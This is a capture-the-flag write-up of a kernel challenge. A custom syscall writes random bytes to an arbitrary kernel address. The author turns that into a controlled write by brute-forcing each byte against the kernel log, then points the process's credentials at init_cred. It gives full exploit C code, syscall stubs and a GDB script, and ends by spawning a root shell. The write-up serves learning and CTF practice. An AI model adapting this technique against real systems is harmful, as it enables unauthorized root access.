The key to r00t is ZcZQndRX or was it DE7NUC6l? Wait, it was r2JLegUE. Eh, you’ll figure it out.
Description
This is a classic kernel challenge setup where we need to elevate our privileges to root to read the flag from a file. A few files are provided, namely the kernel image bzImage, the filesystem root.fs.gz, the kernel symbol map System.map and a run script run.sh.
The run script launches a QEMU instance with the required parameters.
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./root.fs.gz \
-append 'console=ttyS0 rdinit=/sbin/init loglevel=3 oops=panic panic=1' \
-no-reboot \
-nographic \
-monitor /dev/null 2>/dev/null
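From that script alone, we can see that the architecture is x86_64 and that no security features are requested. No -cpu option is passed, so QEMU's default CPU model is used, and it does not expose SMEP or SMAP. The fixed addresses from System.map also turn out to be valid at runtime, so KASLR is not in play either.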
In the root of the filesystem, there is a file named krupt.c which contains some C code to create a new system call.
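#ifndef __NR_KRUPT
#define __NR_KRUPT 420
#endif

u64 l33t = 0;

SYSCALL_DEFINE1(krupt, uint64_t, offs)
{
    /* Target = &l33t + offs, with no bounds check. Arithmetic on void *
     * (a GNU extension) counts bytes, so offs need not be a multiple of 8 */
    u64 *addr = ((void *) &l33t + offs);
    u64 orig = *addr;
    /* Overwrite 8 bytes at the target with random data */
    get_random_bytes(addr, sizeof(u64));
    /* Log the target address, the old value and the new value */
    printk(KERN_INFO "krupt: 0x%016lx: 0x%016lx -> 0x%016lx\n",
           (u64) addr, (u64) orig, *((u64 *) addr));
    return 0;
}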
The syscall number is 420, as specified at the top. It takes an offset as argument, adds it to the address of the global variable l33t and then writes 8 bytes of random data at the resulting address. The target address, as well as both the original and new values, are printed to the kernel log.
The vulnerability is pretty obvious: we get a write primitive to an arbitrary address. However, we don’t control the data written, so how can this be useful for escalating privileges?
Well, let’s start at the beginning.
Interacting with the System Call
The first thing we need for successful exploitation is a way to call the new syscall with custom arguments. The C library provides a function, syscall(), which does exactly that.
#include <unistd.h>

int main() {
    syscall(420, 0xdeadbeef);
    return 0;
}
We can then compile the program with GCC.
gcc -o exploit exploit.c
However, the target system doesn't have GCC installed. It uses BusyBox and only has a small set of utilities. So how do we get the program into the QEMU system?
The only link we share with the system is the console, so we have to paste it somehow. I tried to encode the executable with base64 and paste it into a file, but the buffering made it very unstable, so I tried to reduce its size. I added the -s flag to strip the symbols, but the binary was still too large, so I took extreme measures.
I removed all traces of libc from my program and used the -static and -nostdlib flags. I just wanted to use syscalls, so I created an inline assembly stub to reproduce the syscall function.
/* Minimal x86_64 syscall stub: number in rax, arguments in rdi, rsi, rdx,
 * r10, r8 and r9, return value in rax */
long syscall(long unsigned nr, long unsigned a1, long unsigned a2, long unsigned a3, long unsigned a4, long unsigned a5, long unsigned a6) {
    long res;
    register long unsigned r10 __asm__("r10") = a4;
    register long unsigned r8 __asm__("r8") = a5;
    register long unsigned r9 __asm__("r9") = a6;
    __asm__ volatile(
        "syscall\n"
        : "=a"(res)
        : "a"(nr), "D"(a1), "S"(a2), "d"(a3), "r"(r10), "r"(r8), "r"(r9)
        /* the syscall instruction itself overwrites rcx and r11 */
        : "rcx", "r11", "memory"
    );
    return res;
}

int write(int fd, const char *buf, int count) {
    return syscall(1, fd, (long unsigned) buf, count, 0, 0, 0);
}

void exit(int exitcode) {
    /* exit must never return */
    while (1) {
        syscall(60, exitcode, 0, 0, 0, 0, 0);
    }
}

/* Entry point: without libc, nothing calls main */
void _start() {
    write(1, "Calling the syscall\n", 20);
    syscall(420, 0xdeadbeef, 0, 0, 0, 0, 0);
    exit(0);
}
I also had to replace main with _start, since main is actually called by libc's startup code. Now the binary was small enough that I could reliably encode it with base64, paste it into a file using vi, then decode and execute it. This is far from optimal, but it worked. If you use a different approach to get your exploit onto the machine in this kind of challenge, feel free to message me.
As expected with a fake argument, the call resulted in a kernel panic.
Great.
Going Deeper
I wanted to debug the kernel, so I added the -s -S flags to the QEMU invocation and attached GDB to it. The -s flag opens a GDB server on TCP port 1234, and -S holds the CPU until the debugger tells it to continue. Getting a breakpoint inside the system call would be perfect, but its address is not in the System.map file. However, the address of the syscall table is.
ffffffff81800280 R sys_call_table
By reading entry 420 of the table, where each entry is an 8-byte function pointer, we can find the address of the new system call and disassemble its code.
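As a quick sanity check of that arithmetic, here is a small sketch that computes where the pointer for syscall 420 is stored. It assumes, as on x86_64, that sys_call_table is a flat array of 8-byte function pointers. SYS_CALL_TABLE is the address from System.map, and the helper name is made up for illustration.

```c
#include <stdint.h>

/* Address of sys_call_table, taken from the provided System.map */
#define SYS_CALL_TABLE 0xffffffff81800280ULL

/* Each entry is a 64-bit function pointer, so entry nr lives at
 * table + nr * 8 (hypothetical helper, for illustration only). */
static uint64_t syscall_entry_addr(uint64_t table, unsigned nr)
{
    return table + (uint64_t)nr * sizeof(uint64_t);
}
```

With these values, syscall_entry_addr(SYS_CALL_TABLE, 420) evaluates to 0xffffffff81800fa0. Running x/gx 0xffffffff81800fa0 in GDB should therefore print the address of the handler, and disassembling that address gives the following: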
0xffffffff81044a80: push rbp
0xffffffff81044a81: mov esi,0x8
0xffffffff81044a86: mov rbp,rsp
0xffffffff81044a89: push r13
0xffffffff81044a8b: push r12
0xffffffff81044a8d: push rbx
0xffffffff81044a8e: mov rbx,QWORD PTR [rdi+0x70]
0xffffffff81044a92: lea r12,[rbx-0x7e470e50]
0xffffffff81044a99: mov r13,QWORD PTR [rbx-0x7e470e50]
0xffffffff81044aa0: mov rdi,r12
0xffffffff81044aa3: call 0xffffffff8126c380
0xffffffff81044aa8: mov rcx,QWORD PTR [rbx-0x7e470e50]
0xffffffff81044aaf: mov rdx,r13
0xffffffff81044ab2: mov rsi,r12
0xffffffff81044ab5: mov rdi,0xffffffff818de920
0xffffffff81044abc: call 0xffffffff813cac2c
0xffffffff81044ac1: xor eax,eax
0xffffffff81044ac3: pop rbx
0xffffffff81044ac4: pop r12
0xffffffff81044ac6: pop r13
0xffffffff81044ac8: pop rbp
0xffffffff81044ac9: ret
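The handler receives a pointer to the saved user registers (struct pt_regs), so our argument is loaded from [rdi+0x70], which is the saved rdi. We then notice that the value 0x7e470e50 is subtracted from the supplied argument. This corresponds to the part where the address of the global variable is added to the offset.
We can confirm this value by looking at the address of the variable l33t in the System.map file.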
ffffffff81b8f1b0 B l33t
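Since 0xffffffff81b8f1b0 = 2^64 - 0x7e470e50, adding it in 64-bit arithmetic, where the result wraps around, is equivalent to subtracting 0x7e470e50. The compiler simply encoded the address as a sign-extended 32-bit displacement.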
Knowing this, we can now precisely aim our write primitive.
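The relation between the offset passed to krupt and the address it writes to can be written down directly. This sketch hard-codes the l33t address from System.map, so it only holds without KASLR. The helper names are hypothetical. Unsigned 64-bit arithmetic in C wraps modulo 2^64, which matches the kernel's addition.

```c
#include <stdint.h>

/* Address of l33t from System.map (assumes no KASLR, as in this setup) */
#define L33T_ADDR 0xffffffff81b8f1b0ULL

/* Address krupt writes to for a given offset: &l33t + offs, wrapping
 * modulo 2^64 exactly like the kernel's 64-bit addition. */
static uint64_t krupt_addr(uint64_t offs)
{
    return L33T_ADDR + offs;
}

/* Offset to pass to krupt so that it writes at target. Because
 * L33T_ADDR == 2^64 - 0x7e470e50, this is the same as target + 0x7e470e50. */
static uint64_t krupt_offset(uint64_t target)
{
    return target - L33T_ADDR;
}
```

For instance, krupt_addr(0xdeadbeef) is 0x6066b09f, a low user-space address. If nothing is mapped there, the kernel faults, which would explain the panic from the first test. In the other direction, krupt_offset(t) is just t + 0x7e470e50.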
Getting the Task
Now we need a target to write to.
My first choice was modprobe_path, but I couldn't find it in System.map. It seems that BusyBox has a special way of handling modules, and it's not trivial to exploit.
My second choice was the addr_limit field in the thread_info structure allocated in the kernel for each thread. This structure is accessible through a pointer inside the task_struct of a process.
The addr_limit specifies the upper limit of the virtual addresses that a process is allowed to read and write through system calls. I figured that overwriting it with a sufficiently high random value might allow us to read and write kernel addresses and then escalate our privileges manually.
A pointer to the task_struct of the current process is stored at a fixed address, in the current_task variable.
ffffffff81a38040 D current_task
Note that we need to examine these values while inside the system call, because we need to be sure that the process currently executing is our exploit.
From there, I wanted to find a pointer to the corresponding thread_info structure, but I had trouble figuring out the right offsets since the kernel image is stripped of its symbols. Moreover, these structures have changed a lot in recent kernel versions to improve security.
In any case, I realised that this strategy was flawed from the start. Since most kernel addresses are very high (0xffffffff00000000 and up), the probability that a random 8-byte integer in addr_limit is high enough to read and write kernel structures is very low.
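To put a number on "very low", assume the 8 random bytes are uniformly distributed. The chance that they form a value at least as large as a given address X is then (2^64 - X) / 2^64. The helper below is an illustrative sketch and is not part of the exploit.

```c
#include <stdint.h>

/* Probability that a uniformly random 64-bit value is >= threshold,
 * i.e. (2^64 - threshold) / 2^64. */
static double p_at_least(uint64_t threshold)
{
    /* UINT64_MAX - threshold + 1 == 2^64 - threshold, computed in double
     * to avoid overflowing 64 bits when threshold == 0 */
    double count = (double)(UINT64_MAX - threshold) + 1.0;
    return count / 18446744073709551616.0; /* 2^64 */
}
```

p_at_least(0xffffffff00000000) is exactly 2^-32 (about 2.3e-10). Even the lower direct-mapping region starting at 0xffff888000000000, where the task_struct found later lives, only gives about 7.1e-6 per write.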
I needed a new target.
New Strategy
I couldn’t find any useful structure to overwrite with random data… but what if there was a way to control the data written?
After a few tests, I confirmed that the offset passed to the new syscall didn't have to be aligned to 8 bytes. This means that we might be able to control the data written: once the byte at the target address has the desired value, we shift the address by one byte and repeat! However, we need to know when the desired value has been obtained, and this is where the kernel log comes into play. If we can read the random value written from the log, we can brute-force every byte with 256 tries on average, which is quite acceptable. Therefore, we can transform our random write primitive into an arbitrary write, on the condition that the 7 bytes following our target can hold leftover random garbage.
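The byte-by-byte idea can be tried out entirely in user space. In this sketch, a plain buffer stands in for kernel memory and a xorshift64 generator stands in for get_random_bytes(). Both are assumptions made for the simulation. random_write mirrors krupt by writing 8 bytes at an arbitrary, possibly unaligned, offset. controlled_write retries each position until the byte that landed there is the wanted one. All names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for get_random_bytes(): a xorshift64 PRNG with a fixed seed */
static uint64_t prng_state = 0x123456789abcdef1ULL;

static uint64_t next_random(void)
{
    uint64_t x = prng_state;
    x ^= x << 13;
    x ^= x >> 7;
    x ^= x << 17;
    return prng_state = x;
}

/* Model of krupt: write 8 random bytes at buf + offs (unaligned is fine)
 * and report the byte that landed exactly at buf[offs]. On little-endian
 * x86_64, that is the least significant byte of the logged new value. */
static uint8_t random_write(uint8_t *buf, size_t offs)
{
    uint64_t r = next_random();
    memcpy(buf + offs, &r, sizeof r);
    return buf[offs];
}

/* Turn the random write into a controlled one: retry at offset i until
 * buf[i] == want[i], then move one byte forward. Earlier bytes are never
 * touched again, but the 7 bytes after the last target byte end up holding
 * garbage, so buf must have room for len + 7 bytes. Returns the number of
 * writes performed. */
static unsigned long controlled_write(uint8_t *buf, const uint8_t *want, size_t len)
{
    unsigned long tries = 0;
    size_t i = 0;
    while (i < len) {
        tries++;
        if (random_write(buf, i) == want[i])
            i++;
    }
    return tries;
}
```

Each position needs a geometric number of attempts with success probability 1/256, so a 16-byte target costs about 4096 writes on average, well within reach of a loop that calls the syscall repeatedly.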
So what do we overwrite then? I chose to go with the cred struct, which contains the UID and GID of the process. This struct is also referenced by the task_struct, but I had no clue at which offset to look.
After looking manually for a while, I decided to find the offset programmatically. I used the GDB Python API to check every value inside the task_struct: if a value looks like a pointer, the script dereferences it and looks at its content. I was looking for the value 0x03e8, since our current UID is 1000.
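import gdb

# Address of our task_struct, read from current_task while stopped in the syscall
task_struct = 0xffff88800210d400

for addr in range(task_struct, task_struct + 0x4000, 8):
    # Read one 8-byte word of the task_struct
    result = gdb.execute(f"x/1xg {hex(addr)}", to_string=True)
    value = int(result.splitlines()[0].split("\t")[1], 16)
    # Only follow values that look like pointers into the kernel direct map
    if 0xffff888000000000 < value < 0xffffff0000000000:
        try:
            result = gdb.execute(f"x/8xg {hex(value)}", to_string=True)
        except gdb.error:
            continue  # pointer to unreadable memory, skip it
        # Crude check: look for our UID (1000 = 0x3e8) in the first 64 bytes
        if "03e8" in result:
            print(f"Got it at {hex(addr)}")
            print(result)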
I found two occurrences, at offsets 0xf10 and 0xf18 (presumably the real_cred and cred pointers). When calling execve (to get a shell), both of these values must be identical or the kernel will panic. The good news is that these two pointers are adjacent, and the field right after them can be corrupted without causing any problem.
I could have overwritten the credentials themselves with zeros, but instead I chose to overwrite the pointers so that they point to an existing root cred structure.
ffffffff81a3d440 D init_cred
The init_cred structure is the cred struct of the init process, which obviously runs as root. If we make our task_struct point to it, we should be able to spawn a root shell.
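Since x86_64 is little-endian, the 16 bytes we need to write are the bytes of init_cred's address from least to most significant, repeated twice. The helper below is a hypothetical way to get the expected byte at each position directly. INIT_CRED is taken from System.map.

```c
#include <stdint.h>

/* Address of init_cred from System.map */
#define INIT_CRED 0xffffffff81a3d440ULL

/* Byte that must end up at offset i (0..15) from the first of the two
 * adjacent cred pointers so that both hold cred. On little-endian x86_64,
 * byte k of a pointer is (value >> (8 * k)) & 0xff, and the second
 * pointer starts at offset 8. */
static uint8_t wanted_byte(uint64_t cred, unsigned i)
{
    return (uint8_t)(cred >> (8 * (i % 8)));
}
```

wanted_byte(INIT_CRED, 0) is 0x40 and wanted_byte(INIT_CRED, 1) is 0xd4. These match the last two hex digits of ffffffff81a3d440 and the two digits before them.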
Reading the Kernel Log
The last piece of the puzzle is reading the kernel log to check the random value written. Usually, a normal user can look at the log with dmesg, but here we need to do it from a C program. Fortunately, there is a syscall to do just that!
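The syslog syscall allows a program to read the last bytes of the kernel log buffer. We can find its number in the syscall table: 103 on x86_64. Action type 3 (SYSLOG_ACTION_READ_ALL) copies the last len bytes of the log into the supplied buffer without clearing it.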
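Each krupt record has the same length: 71 bytes. That is the 3-byte <6> log-level prefix that syslog adds, followed by the 68-byte message. The fixed 71-byte reads imply that this kernel prints no timestamp. Therefore, we can simply read the last 71 bytes into a buffer and check whether the last two hex digits of the new value (offsets 68 and 69) match the wanted byte. Those two digits encode the byte written exactly at the target address. When they match, we increment the address, until both pointers are overwritten.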
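The new value can also be located in the log text instead of relying on hard-coded offsets 68 and 69. This sketch assumes the record format from krupt.c, where the new value is printed with %016lx right after "-> 0x". It also assumes the buffer holds the tail of the log as returned by syslog type 3. new_value_lsb, hex_digit and matches_at are hypothetical helpers. They call no libc functions, so the same approach could be dropped into a -nostdlib build.

```c
#include <stddef.h>

/* Value of one hex digit, or -1 if c is not a hex digit */
static int hex_digit(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Compare n bytes without relying on libc's memcmp */
static int matches_at(const char *s, const char *m, size_t n)
{
    for (size_t k = 0; k < n; k++)
        if (s[k] != m[k])
            return 0;
    return 1;
}

/* Return the least significant byte of the new value in the most recent
 * krupt record of log[0..len), or -1 if no complete record is found.
 * Assumes the format from krupt.c: "... -> 0x" followed by 16 hex digits. */
static int new_value_lsb(const char *log, size_t len)
{
    static const char marker[] = "-> 0x";
    const size_t mlen = sizeof marker - 1;  /* 5 characters */
    const size_t need = mlen + 16;          /* marker + 16 hex digits */

    if (len < need)
        return -1;
    /* Scan backwards so the last record in the buffer wins */
    for (size_t i = len - need + 1; i-- > 0;) {
        if (matches_at(log + i, marker, mlen)) {
            /* The last two of the 16 digits encode the lowest byte */
            int hi = hex_digit(log[i + mlen + 14]);
            int lo = hex_digit(log[i + mlen + 15]);
            return (hi < 0 || lo < 0) ? -1 : (hi << 4) | lo;
        }
    }
    return -1;
}
```

In a brute-force loop, the result would be compared against the byte wanted at the current index. The loop would pass the number of bytes actually returned by syslog as len.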
Final Exploit
Putting it all together, we get this final exploit code.
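/* Minimal x86_64 syscall stub: number in rax, arguments in rdi, rsi, rdx,
 * r10, r8 and r9, return value in rax */
long syscall(long unsigned nr, long unsigned a1, long unsigned a2, long unsigned a3, long unsigned a4, long unsigned a5, long unsigned a6) {
    long res;
    register long unsigned r10 __asm__("r10") = a4;
    register long unsigned r8 __asm__("r8") = a5;
    register long unsigned r9 __asm__("r9") = a6;
    __asm__ volatile(
        "syscall\n"
        : "=a"(res)
        : "a"(nr), "D"(a1), "S"(a2), "d"(a3), "r"(r10), "r"(r8), "r"(r9)
        /* the syscall instruction itself overwrites rcx and r11 */
        : "rcx", "r11", "memory"
    );
    return res;
}

int write(int fd, const char *buf, int count) {
    return syscall(1, fd, (long unsigned) buf, count, 0, 0, 0);
}

int syslog(int type, const char *buf, int len) {
    return syscall(103, type, (long unsigned) buf, len, 0, 0, 0);
}

int execve(const char *filename, char *argv[], char *envp[]) {
    return syscall(59, (long unsigned) filename, (long unsigned) argv, (long unsigned) envp, 0, 0, 0);
}

void exit(int exitcode) {
    /* exit must never return */
    while (1) {
        syscall(60, exitcode, 0, 0, 0, 0, 0);
    }
}

/* Entry point: without libc, nothing calls main */
void _start() {
    int index = 0;
    char logbuf[1024];
    /* init_cred twice, in hex; digits are matched from the end of the
     * string, i.e. least significant byte first (little-endian) */
    char target[32] = "ffffffff81a3d440ffffffff81a3d440";
    do {
        /* 0xffff88800210ed90: first cred pointer in our task_struct;
         * adding 0x7e470e50 cancels out &l33t; index shifts the write */
        syscall(420, 0xffff88800210ed90+0x7e470e50+index, 0, 0, 0, 0, 0);
        /* SYSLOG_ACTION_READ_ALL: read the last 71 bytes (the krupt record) */
        syslog(3, logbuf, 71);
        write(1, logbuf, 71);
        /* logbuf[68..69]: last two hex digits of the new value, i.e. the
         * byte that landed exactly at the target address */
        if (logbuf[68] == target[30-(index*2)] && logbuf[69] == target[31-(index*2)])
            index++;
    } while (index < 16);
    write(1, "Enjoy your shell\n", 17);
    char *args[2] = {"sh", 0};
    execve("/bin/sh", args, 0);
    exit(0);
}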
Once run on the remote server, we are rewarded with a sweet root shell.